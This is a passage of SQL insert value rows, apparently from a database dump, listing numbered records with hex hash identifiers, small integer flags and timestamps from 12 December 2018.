(37570, 'bcbdd6833c965ea462cf30f7bc143b26', '2034f09284a4c7ca', 0, 2, 1, '2018-12-12 16:17:40'),
(37571, 'be50ddd1a1dd60fb479a8c4e2584cc0b', 'cedfede1dd4805e0', 0, 2, 1, '2018-12-12 16:19:06'),
(37572, 'ac1908ad7bd22602dc229e4e20f0ab18', '6b39dd77c46d78c8', 0, 2, 1, '2018-12-12 16:19:55'),
(37573, 'ba603f69bb9cfa0f92da6a159780d9a8', '7ac4f2ef7ec34950', 0, 2, 1, '2018-12-12 16:19:56'),
(37574, 'be50ddd1a1dd60fb479a8c4e2584cc0b', 'cedfede1dd4805e0', 0, 2, 1, '2018-12-12 16:20:30'),
(37575, 'f63e301ea2c3fa81373245e373fbe04f', '7501b42c35accff7', 0, 2, 1, '2018-12-12 16:20:34'),
(37576, 'd73292bf0fa7df410d46c47804f839fb', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-12-12 16:21:03'),
(37577, 'd73292bf0fa7df410d46c47804f839fb', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-12-12 16:21:24'),
(37578, 'f2212180451f2cb5eb950ba1792e87a6', 'c514e7e6a3d62680', 0, 2, 1, '2018-12-12 16:22:08'),
(37579, '7e0f161eb6490d4b106494b621350055', 'dc0eb5528af4b039', 0, 2, 1, '2018-12-12 16:22:50'),
(37580, '7e0f161eb6490d4b106494b621350055', 'dc0eb5528af4b039', 0, 2, 1, '2018-12-12 16:23:36'),
(37581, 'f18bc369bdc8b7bdc734c7f8f6586bf0', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-12 16:24:14'),
(37582, 'a56eed693f83722c0d634c09a83c776a', '4765b5e8fd392dd4', 0, 2, 1, '2018-12-12 16:24:38'),
(37583, 'cdd23cc812d53efca94dd3c1529cb297', '46713cac27a94b83', 0, 2, 1, '2018-12-12 16:25:00'),
(37584, 'b874bb4eaf5b108916146e8468c9c738', 'cecbbed92be051a9', 0, 2, 1, '2018-12-12 16:26:19'),
(37585, '89de6103b7e7d464e31163ec0b8acf1d', '074ec8007ba74449', 0, 2, 1, '2018-12-12 16:28:30'),
(37586, 'dc0f68a93543ec93c25e1b8ea2323761', '84c73015e9e28e8a', 0, 2, 1, '2018-12-12 16:31:42'),
(37587, 'dc0f68a93543ec93c25e1b8ea2323761', '84c73015e9e28e8a', 0, 2, 1, '2018-12-12 16:32:03'),
(37588, 'f2212180451f2cb5eb950ba1792e87a6', 'c514e7e6a3d62680', 0, 2, 1, '2018-12-12 16:33:35'),
(37589, '87f3490830b98157ac2e08f9471ba173', 'e706e9a0184b2202', 0, 2, 1, '2018-12-12 16:34:07'),
(37590, '87f3490830b98157ac2e08f9471ba173', 'e706e9a0184b2202', 0, 2, 1, '2018-12-12 16:34:52'),
(37591, '9f32f203f5c37844cdd9372def51b290', 'a2a455ee27dc8a2c', 0, 2, 1, '2018-12-12 16:35:00'),
(37592, '9f32f203f5c37844cdd9372def51b290', 'a2a455ee27dc8a2c', 0, 2, 1, '2018-12-12 16:36:53'),
(37593, 'f2212180451f2cb5eb950ba1792e87a6', 'c514e7e6a3d62680', 0, 2, 1, '2018-12-12 16:37:52'),
(37594, 'f2212180451f2cb5eb950ba1792e87a6', 'c514e7e6a3d62680', 0, 2, 1, '2018-12-12 16:40:15'),
(37595, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 16:40:21'),
(37596, '1989ca588a765780de98a8a111e11581', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-12 16:40:35'),
(37597, 'f315a61d1262b9ae959446d52a0a88f7', '4a7924dd4418962c', 0, 2, 1, '2018-12-12 16:40:51'),
(37598, 'f315a61d1262b9ae959446d52a0a88f7', '4a7924dd4418962c', 0, 2, 1, '2018-12-12 16:41:05'),
(37599, '9f32f203f5c37844cdd9372def51b290', 'a2a455ee27dc8a2c', 0, 2, 1, '2018-12-12 16:44:17'),
(37600, '15f2b429e7e46b3172e5350639274274', '288a3fac1565dd18', 0, 2, 1, '2018-12-12 16:44:34'),
(37601, 'd73292bf0fa7df410d46c47804f839fb', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-12-12 16:45:35'),
(37602, 'f38725caa3c76c33de76aae376143a3c', 'd8923e60c6dca0dc', 0, 2, 1, '2018-12-12 16:45:53'),
(37603, 'a0f0e879da8809dd471cda0d1e8dd7b7', 'e3454d790deac400', 0, 2, 1, '2018-12-12 16:45:59'),
(37604, 'dc0f68a93543ec93c25e1b8ea2323761', '84c73015e9e28e8a', 0, 2, 1, '2018-12-12 16:47:20'),
(37605, 'dc0f68a93543ec93c25e1b8ea2323761', '84c73015e9e28e8a', 0, 2, 1, '2018-12-12 16:47:34'),
(37606, 'af28004b6d86c4ad99f7820e45c0b536', '3a2c608ca58ceabc', 0, 2, 1, '2018-12-12 16:49:01'),
(37607, '220680ad0df89789969b35826fdba5a4', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-12 16:49:20'),
(37608, '8f89115d82bcbc9064d7978b9854155a', 'f93b36bb374ed1a7', 0, 2, 1, '2018-12-12 16:49:23'),
(37609, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 16:50:16'),
(37610, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 16:51:26'),
(37611, 'a942efb3d184558c8caa05ef40edf5a3', '608ea89c6400787c', 0, 2, 1, '2018-12-12 16:54:28'),
(37612, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-12 16:54:49'),
(37613, 'cedb696e7d6e9e062eaccd6d09d88429', '1c68b977b911188c', 0, 2, 1, '2018-12-12 16:55:31'),
(37614, 'ade60e1bdbf29e63d82a1b327c3d9b15', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-12 16:55:35'),
(37615, '15f2b429e7e46b3172e5350639274274', '288a3fac1565dd18', 0, 2, 1, '2018-12-12 16:55:35'),
(37616, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 16:55:50'),
(37617, 'a942efb3d184558c8caa05ef40edf5a3', '608ea89c6400787c', 0, 2, 1, '2018-12-12 16:56:34'),
(37618, 'a942efb3d184558c8caa05ef40edf5a3', '608ea89c6400787c', 0, 2, 1, '2018-12-12 16:56:47'),
(37619, 'a942efb3d184558c8caa05ef40edf5a3', '608ea89c6400787c', 0, 2, 1, '2018-12-12 16:56:51'),
(37620, '6e2779a3ea43d84d4daba81515925775', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-12 16:57:40'),
(37621, '15f2b429e7e46b3172e5350639274274', '288a3fac1565dd18', 0, 2, 1, '2018-12-12 16:58:33'),
(37622, '5cd2d3b5848818235f895306e33765cb', '358a3a4d13e5d4e5', 0, 2, 1, '2018-12-12 16:59:30'),
(37623, '310591e6d3ff1e17813dca2a50882a14', '9d7d448493052745', 0, 2, 1, '2018-12-12 16:59:52'),
(37624, 'cedb696e7d6e9e062eaccd6d09d88429', '1c68b977b911188c', 0, 2, 1, '2018-12-12 17:00:09'),
(37625, '5cd2d3b5848818235f895306e33765cb', '358a3a4d13e5d4e5', 0, 2, 1, '2018-12-12 17:01:07'),
(37626, 'fdb08b860710905088f4fb1ade0302f6', '9fa71c818742c95f', 0, 2, 1, '2018-12-12 17:01:10'),
(37627, 'ed9d08df09ba40f09a6129ebaebb6335', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-12 17:01:38'),
(37628, 'd55300fa30009e8493340f15ac30aa65', '8e9e7816173ea9db', 0, 2, 1, '2018-12-12 17:04:05'),
(37629, 'a26679ad7c27e925175af2e13020025c', '2316fb5c07fc7e67', 0, 2, 1, '2018-12-12 17:06:48'),
(37630, 'a26679ad7c27e925175af2e13020025c', '2316fb5c07fc7e67', 0, 2, 1, '2018-12-12 17:07:07'),
(37631, 'bcbdd6833c965ea462cf30f7bc143b26', '2034f09284a4c7ca', 0, 2, 1, '2018-12-12 17:09:29'),
(37632, '7c4ea45fe53436c83286804734b30d94', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-12 17:09:37'),
(37633, 'd55300fa30009e8493340f15ac30aa65', '8e9e7816173ea9db', 0, 2, 1, '2018-12-12 17:10:48'),
(37634, '4254b96fb2c8f4cd0303a232c1bafc25', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-12 17:11:38'),
(37635, 'e1051b4f7b0439c32ab98846adb73c98', 'cad202a09758cb3a', 0, 2, 1, '2018-12-12 17:13:56'),
(37636, '4254b96fb2c8f4cd0303a232c1bafc25', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-12 17:14:55'),
(37637, 'fdb08b860710905088f4fb1ade0302f6', '9fa71c818742c95f', 0, 2, 1, '2018-12-12 17:18:30'),
(37638, '20bd717bbfc17a8068044b46b288dcf8', '2ea7201b0e939b00', 0, 2, 1, '2018-12-12 17:18:38'),
(37639, 'd8eeebad91012599fb0db081446e6770', 'a639f655bef0fc87', 0, 2, 1, '2018-12-12 17:19:38'),
(37640, '8d811b1cab9a98242f7b83ff76d8dd07', 'd3902e08ef0206de', 0, 2, 1, '2018-12-12 17:19:49'),
(37641, '8d811b1cab9a98242f7b83ff76d8dd07', 'd3902e08ef0206de', 0, 2, 1, '2018-12-12 17:20:12'),
(37642, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 17:20:25'),
(37643, 'e1051b4f7b0439c32ab98846adb73c98', 'cad202a09758cb3a', 0, 2, 1, '2018-12-12 17:22:39'),
(37644, 'd55300fa30009e8493340f15ac30aa65', '8e9e7816173ea9db', 0, 2, 1, '2018-12-12 17:24:08'),
(37645, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:24:38'),
(37646, '6e2779a3ea43d84d4daba81515925775', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-12 17:24:54'),
(37647, '82ab86d5a34f0b863097d7f4570b6e46', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-12 17:26:47'),
(37648, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-12 17:27:10'),
(37649, 'a0f0e879da8809dd471cda0d1e8dd7b7', 'e3454d790deac400', 0, 2, 1, '2018-12-12 17:27:22'),
(37650, '19838deb391b0040b4d2f70034407f89', '57a9d45c2fb49483', 0, 2, 1, '2018-12-12 17:27:25'),
(37651, 'e062ea7a46f327d0165fced7ab55d9de', 'dc0eb5528af4b039', 0, 2, 1, '2018-12-12 17:27:30'),
(37652, '82ab86d5a34f0b863097d7f4570b6e46', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-12 17:27:50'),
(37653, '89c997db2bc4304d882f84cda22ad01d', '9fa71c818742c95f', 0, 2, 1, '2018-12-12 17:28:09'),
(37654, '19838deb391b0040b4d2f70034407f89', '57a9d45c2fb49483', 0, 2, 1, '2018-12-12 17:29:04'),
(37655, 'be50ddd1a1dd60fb479a8c4e2584cc0b', 'cedfede1dd4805e0', 0, 2, 1, '2018-12-12 17:29:50'),
(37656, 'be50ddd1a1dd60fb479a8c4e2584cc0b', 'cedfede1dd4805e0', 0, 2, 1, '2018-12-12 17:30:23'),
(37657, 'a26679ad7c27e925175af2e13020025c', '2316fb5c07fc7e67', 0, 2, 1, '2018-12-12 17:30:44'),
(37658, 'a26679ad7c27e925175af2e13020025c', '2316fb5c07fc7e67', 0, 2, 1, '2018-12-12 17:31:06'),
(37659, 'a0f0e879da8809dd471cda0d1e8dd7b7', 'e3454d790deac400', 0, 2, 1, '2018-12-12 17:31:26'),
(37660, 'a26679ad7c27e925175af2e13020025c', '2316fb5c07fc7e67', 0, 2, 1, '2018-12-12 17:31:30'),
(37661, '19838deb391b0040b4d2f70034407f89', '57a9d45c2fb49483', 0, 2, 1, '2018-12-12 17:31:34'),
(37662, 'cedb696e7d6e9e062eaccd6d09d88429', '1c68b977b911188c', 0, 2, 1, '2018-12-12 17:33:11'),
(37663, 'b87fa38377b3dfe6159148ddb2639624', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-12 17:34:55'),
(37664, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:35:44'),
(37665, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:35:50'),
(37666, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:36:07'),
(37667, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:36:30'),
(37668, 'b87fa38377b3dfe6159148ddb2639624', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-12 17:36:53'),
(37669, '9fbfa59111abd02f88a0b4ab73043db4', 'b1e152f25b877a1e', 0, 2, 1, '2018-12-12 17:37:54'),
(37670, '92e065e34844f6848f302392ff604146', '20e1e92dd15da725', 0, 2, 1, '2018-12-12 17:39:09'),
(37671, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 17:40:10'),
(37672, 'd55300fa30009e8493340f15ac30aa65', '8e9e7816173ea9db', 0, 2, 1, '2018-12-12 17:40:36'),
(37673, '62cd9f2b09ed07ffb79ecdf6cb118fbd', '9fa71c818742c95f', 0, 2, 1, '2018-12-12 17:42:21'),
(37674, 'ac8a68181d6fc83f7fc30b0e34d76633', '74aba437eea39f30', 0, 2, 1, '2018-12-12 17:42:21'),
(37675, 'f315a61d1262b9ae959446d52a0a88f7', '4a7924dd4418962c', 0, 2, 1, '2018-12-12 17:42:43'),
(37676, '92e065e34844f6848f302392ff604146', '20e1e92dd15da725', 0, 2, 1, '2018-12-12 17:43:29'),
(37677, '1846e368c8589ec96e0fea56e957764b', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-12 17:46:30'),
(37678, '92e065e34844f6848f302392ff604146', '20e1e92dd15da725', 0, 2, 1, '2018-12-12 17:46:35'),
(37679, 'fe321a5af4e95efaf0683853b3d6e902', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-12 17:46:43'),
(37680, '48fce790e2bd40095c89b5e878b63121', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-12 17:46:47'),
(37681, 'e1051b4f7b0439c32ab98846adb73c98', 'cad202a09758cb3a', 0, 2, 1, '2018-12-12 17:47:02'),
(37682, '48fce790e2bd40095c89b5e878b63121', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-12 17:47:14'),
(37683, '48fce790e2bd40095c89b5e878b63121', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-12 17:47:30'),
(37684, 'c33525933f662efa8a9360e76ce0e49b', '220b6bed49713ca3', 0, 2, 1, '2018-12-12 17:49:16'),
(37685, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 17:50:16'),
(37686, '220680ad0df89789969b35826fdba5a4', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-12 17:50:40'),
(37687, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-12 17:51:28'),
(37688, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-12 17:51:28'),
(37689, '9c186ce14dd4299b29c669e749faccc7', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-12 17:51:41'),
(37690, 'a1e0ead7deb17aef164f674f4ab711a5', '7e7b8558fe1fccd3', 0, 2, 1, '2018-12-12 17:51:43'),
(37691, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 17:51:45'),
(37692, 'ab719934d3af207de60813feb6334fe7', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-12 17:51:53'),
(37693, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 17:52:05'),
(37694, 'ab719934d3af207de60813feb6334fe7', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-12 17:52:16'),
(37695, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 17:52:37'),
(37696, 'a56eed693f83722c0d634c09a83c776a', '4765b5e8fd392dd4', 0, 2, 1, '2018-12-12 17:52:57'),
(37697, 'b0bb830ea280f6ac9f073d57e3061af1', '16d2e6e92c47b8e6', 0, 2, 1, '2018-12-12 17:53:26'),
(37698, '052b59575e934c76a36db1db88eace46', '27c9262d32924a72', 0, 2, 1, '2018-12-12 17:53:41'),
(37699, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 17:53:49'),
(37700, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 17:54:02'),
(37701, 'b87fa38377b3dfe6159148ddb2639624', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-12 17:54:26'),
(37702, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 17:55:01'),
(37703, 'a1e0ead7deb17aef164f674f4ab711a5', '7e7b8558fe1fccd3', 0, 2, 1, '2018-12-12 17:55:06'),
(37704, '4643423e75e65aad5a66a18f9235b1c0', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-12 17:55:40'),
(37705, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:55:53'),
(37706, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 17:56:22'),
(37707, '1bb0672a44d1a9eaebf0e1e008007b44', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-12 17:56:33'),
(37708, 'c49d3b33b68eeff49433b3dcf0dd9d8b', '1b5e475496daa72c', 0, 2, 1, '2018-12-12 17:56:33'),
(37709, '4643423e75e65aad5a66a18f9235b1c0', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-12 17:56:34'),
(37710, '4643423e75e65aad5a66a18f9235b1c0', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-12 17:56:58'),
(37711, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 17:57:04'),
(37712, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 17:57:28'),
(37713, 'c33525933f662efa8a9360e76ce0e49b', '220b6bed49713ca3', 0, 2, 1, '2018-12-12 17:57:37'),
(37714, '4643423e75e65aad5a66a18f9235b1c0', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-12 17:57:37'),
(37715, 'be73cb23b0cc08811ae731b1772fe24c', '71aaffc000bb3bae', 0, 2, 1, '2018-12-12 17:57:44'),
(37716, '1bb0672a44d1a9eaebf0e1e008007b44', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-12 17:59:30'),
(37717, 'cec0ba37a2024becc0fb66f7a8ddffb0', '1fe68226bb896748', 0, 2, 1, '2018-12-12 18:00:59'),
(37718, 'e1051b4f7b0439c32ab98846adb73c98', 'cad202a09758cb3a', 0, 2, 1, '2018-12-12 18:01:16'),
(37719, '6c70fe3526958c6e1c91eebd02844d4e', 'a53ff71224e589e3', 0, 2, 1, '2018-12-12 18:02:22'),
(37720, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 18:02:49'),
(37721, '82ab86d5a34f0b863097d7f4570b6e46', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-12 18:02:51'),
(37722, 'bcbdd6833c965ea462cf30f7bc143b26', '2034f09284a4c7ca', 0, 2, 1, '2018-12-12 18:03:25'),
(37723, '49f59fd445f5ba5e00a2a346743d5307', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 18:03:57'),
(37724, '1bb0672a44d1a9eaebf0e1e008007b44', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-12 18:04:00'),
(37725, '82ab86d5a34f0b863097d7f4570b6e46', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-12 18:04:03'),
(37726, '1bb0672a44d1a9eaebf0e1e008007b44', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-12 18:04:15'),
(37727, '52fa0e3d8292d8909e998c0333a8ce60', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-12 18:05:00'),
(37728, 'e1051b4f7b0439c32ab98846adb73c98', 'cad202a09758cb3a', 0, 2, 1, '2018-12-12 18:05:42'),
(37729, 'fef23f01e755a325eb84793491d1dddb', '863b661787591b2d', 0, 2, 1, '2018-12-12 18:07:22'),
(37730, '48fce790e2bd40095c89b5e878b63121', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-12 18:07:34'),
(37731, '48fce790e2bd40095c89b5e878b63121', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-12 18:07:41'),
(37732, 'f315a61d1262b9ae959446d52a0a88f7', '4a7924dd4418962c', 0, 2, 1, '2018-12-12 18:08:06'),
(37733, 'e8383a060c1bebd8d488347c1a3bd60b', '02ee6768142e877d', 0, 2, 1, '2018-12-12 18:08:10'),
(37734, 'ab719934d3af207de60813feb6334fe7', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-12 18:08:30'),
(37735, '184abb1cd82bd9a6169c627a19c7c72f', 'dcadb578720d99b9', 0, 2, 1, '2018-12-12 18:09:25'),
(37736, '184abb1cd82bd9a6169c627a19c7c72f', 'dcadb578720d99b9', 0, 2, 1, '2018-12-12 18:09:37'),
(37737, 'ca804144531391f4b20482958a57d3a9', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 18:09:40'),
(37738, 'ca804144531391f4b20482958a57d3a9', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 18:10:14'),
(37739, 'ca804144531391f4b20482958a57d3a9', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 18:11:14'),
(37740, 'ca804144531391f4b20482958a57d3a9', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 18:11:21'),
(37741, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 18:11:23'),
(37742, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 18:11:41'),
(37743, '1fbf262e4438561b4e67a1294fa95591', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-12 18:12:00'),
(37744, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 18:12:41'),
(37745, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 18:13:38'),
(37746, 'f7d39e88e87a0be94d3d7cbafdc0e496', '5d05c790f4830fad', 0, 2, 1, '2018-12-12 18:13:55'),
(37747, '9c186ce14dd4299b29c669e749faccc7', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-12 18:13:59'),
(37748, '8c00fa2ebf8a23db4ccd6fe50f5a6e63', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-12 18:14:21'),
(37749, 'be50ddd1a1dd60fb479a8c4e2584cc0b', 'cedfede1dd4805e0', 0, 2, 1, '2018-12-12 18:17:29'),
(37750, '028bea36922e4ae29a8c4c94927d2190', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-12 18:19:31'),
(37751, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-12 18:20:37'),
(37752, 'ade60e1bdbf29e63d82a1b327c3d9b15', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-12 18:20:40'),
(37753, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-12 18:21:20'),
(37754, '06588a7c676d3de2c309ba62a287b613', '1d313f63226b4f9f', 0, 2, 1, '2018-12-12 18:21:40'),
(37755, 'c4a1bd37033f9e3b66fa507eed0d8a48', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-12 18:21:51'),
(37756, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 18:22:07'),
(37757, 'c1fda19f6c28127ff184688b2b704fd1', '50d02461c9e1908b', 0, 2, 1, '2018-12-12 18:23:16'),
(37758, 'c1fda19f6c28127ff184688b2b704fd1', '50d02461c9e1908b', 0, 2, 1, '2018-12-12 18:23:32'),
(37759, '6cf1ff79c1ef2165ff38f0db80b1b781', 'e216e7808556cb4e', 0, 2, 1, '2018-12-12 18:25:10'),
(37760, '028bea36922e4ae29a8c4c94927d2190', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-12 18:25:26'),
(37761, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-12 18:26:59'),
(37762, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-12 18:29:55'),
(37763, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 18:31:06'),
(37764, 'cdd6b312a0b5556559b94318ba81a083', '68e262710bf07c1c', 0, 2, 1, '2018-12-12 18:31:21'),
(37765, 'f315a61d1262b9ae959446d52a0a88f7', '4a7924dd4418962c', 0, 2, 1, '2018-12-12 18:32:00'),
(37766, 'c33525933f662efa8a9360e76ce0e49b', '220b6bed49713ca3', 0, 2, 1, '2018-12-12 18:33:29'),
(37767, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 18:42:02'),
(37768, '184abb1cd82bd9a6169c627a19c7c72f', 'dcadb578720d99b9', 0, 2, 1, '2018-12-12 18:43:36'),
(37769, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-12 18:43:37'),
(37770, 'e8383a060c1bebd8d488347c1a3bd60b', '02ee6768142e877d', 0, 2, 1, '2018-12-12 18:45:11'),
(37771, 'e2ce76b8fc1d022c56578128d63c2b74', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-12 18:49:20'),
(37772, 'c33525933f662efa8a9360e76ce0e49b', '220b6bed49713ca3', 0, 2, 1, '2018-12-12 18:50:10'),
(37773, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-12 18:52:49'),
(37774, 'b27be420e734f5b8be0bfeb4fd284820', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-12 18:52:55'),
(37775, '0830208a7440a91912204aaa68dbec2a', 'dba586f99a089544', 0, 2, 1, '2018-12-12 18:54:08'),
(37776, 'b2c40719abfeb92252bdd13a3c71df58', '9113ca554f25f876', 0, 2, 1, '2018-12-12 18:54:28'),
(37777, '17bc9aeb87f4899c5f32864da1a4c335', '0ca668ef936b8885', 0, 2, 1, '2018-12-12 18:54:36'),
(37778, '7a86c1f7667b367796e53032592b0484', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-12 18:54:54'),
(37779, '4254b96fb2c8f4cd0303a232c1bafc25', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-12 18:55:21'),
(37780, 'f6b932366a0f31313f53a5618e524ac4', '620e46e6f035e4e9', 0, 2, 1, '2018-12-12 18:55:31'),
(37781, 'c33525933f662efa8a9360e76ce0e49b', '220b6bed49713ca3', 0, 2, 1, '2018-12-12 18:56:02'),
(37782, 'b2c40719abfeb92252bdd13a3c71df58', '9113ca554f25f876', 0, 2, 1, '2018-12-12 18:56:05'),
(37783, 'b2c40719abfeb92252bdd13a3c71df58', '9113ca554f25f876', 0, 2, 1, '2018-12-12 18:56:27'),
(37784, '86431cb6e57feb60e6c66001721ab862', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-12 18:56:48'),
(37785, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-12 18:56:55'),
(37786, 'b2c40719abfeb92252bdd13a3c71df58', '9113ca554f25f876', 0, 2, 1, '2018-12-12 18:57:07'),
(37787, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 18:57:09'),
(37788, 'b2c40719abfeb92252bdd13a3c71df58', '9113ca554f25f876', 0, 2, 1, '2018-12-12 18:57:31'),
(37789, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-12 18:59:18'),
(37790, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 18:59:31'),
(37791, '3fec6c27f6cca02fbfe0ad42d7bde299', '9113ca554f25f876', 0, 2, 1, '2018-12-12 19:00:07'),
(37792, '3fec6c27f6cca02fbfe0ad42d7bde299', '9113ca554f25f876', 0, 2, 1, '2018-12-12 19:00:30'),
(37793, '3fec6c27f6cca02fbfe0ad42d7bde299', '9113ca554f25f876', 0, 2, 1, '2018-12-12 19:00:54'),
(37794, '3fec6c27f6cca02fbfe0ad42d7bde299', '9113ca554f25f876', 0, 2, 1, '2018-12-12 19:02:46'),
(37795, '3fec6c27f6cca02fbfe0ad42d7bde299', '9113ca554f25f876', 0, 2, 1, '2018-12-12 19:03:47'),
(37796, '30e1109dc1a9113ae9d667782be19074', '6092d6c1cb041b23', 0, 2, 1, '2018-12-12 19:05:51'),
(37797, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 19:06:13'),
(37798, '86431cb6e57feb60e6c66001721ab862', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-12 19:06:14'),
